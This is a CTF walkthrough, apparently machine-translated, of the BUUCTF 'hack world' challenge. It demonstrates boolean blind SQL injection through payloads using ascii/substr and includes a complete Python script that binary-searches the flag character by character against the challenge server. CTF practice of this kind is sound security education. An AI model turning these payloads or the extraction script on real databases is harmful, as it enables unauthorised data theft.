Buuctf breakthrough diary -- [ciscn2019 North China division Day2 web1]hack world

Abominable , Obviously, I thought it was written for myself , More and more articles are written , I care more and more about whether others will read my articles , It's still too prestigious , I have to be clear ( This is for yourself , This is for yourself , This is for yourself )

Enter the page , You can see that there is only one white box , Mostly SQL Inject

Start the problem directly

 Input :1   The echo :Hello, glzjin wants a girlfriend.
 Input :2   The echo :Do you want to be my girlfriend?

Judge whether there is sql Inject

Input separately

1+1
2-1
1*1
2/2    // Only 2/2 There is echo after operation , But there are still sql Injected 

Then judge what characters are filtered

482 The length is filtered

It is not difficult for us to find that the input page returns bool type , So I thought of Boolean blind note for the first time

Use if For injection

First enter if(1=1,1,2)

Get input 1 Echo of

Input again if(1=2,1,2)

Get input 2 Echo of

Because here he is bool type , So there is a way

0^(ascii(substr((select(flag)from(flag)),1,1))>32) 

If the later result is 1 So the return result is 1    That is, the page will output Hello, glzjin wants a girlfriend.

If the later result is 0 So the return result is 0

So we can echo whether to output Hello As a sign

because flag It's too impractical to try one by one for a long time , So just use it. python Of requests Module crawling test

import requests
import time

rest = ""  #  Set it up in advance 
url = "http://ac2ffe10-c893-4b41-a3dc-5b135cc05721.node4.buuoj.cn:81/"
payload = {"id": ""}
for i in range(1, 100):
    begin = 33
    end = 130
    middle = (begin+end) >> 1  #  Remember to put parentheses    The result is right begin+end Divide 2 Integer 
    while begin < end:
        payload["id"] = "0^(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, middle)  # {0}{1} Represents the first passed in parameter and the second passed in parameter 
        resp = requests.post(url, data=payload)  # data The input must be a dictionary 
        if "Hello" in resp.text:
            begin = middle + 1
        else:
            end = middle
        middle = (begin + end) >> 1
        time.sleep(1)
    if chr(middle) == " ":
        break
    rest += chr(middle)
    print("flag:" + rest)
print(rest)

The annotation is the pit I stepped on , Look at someone else's exp Write it yourself    

Why this begin=middle+1 You have to reason for yourself , Then there is no other equivalent alternative to try

You can get flag 了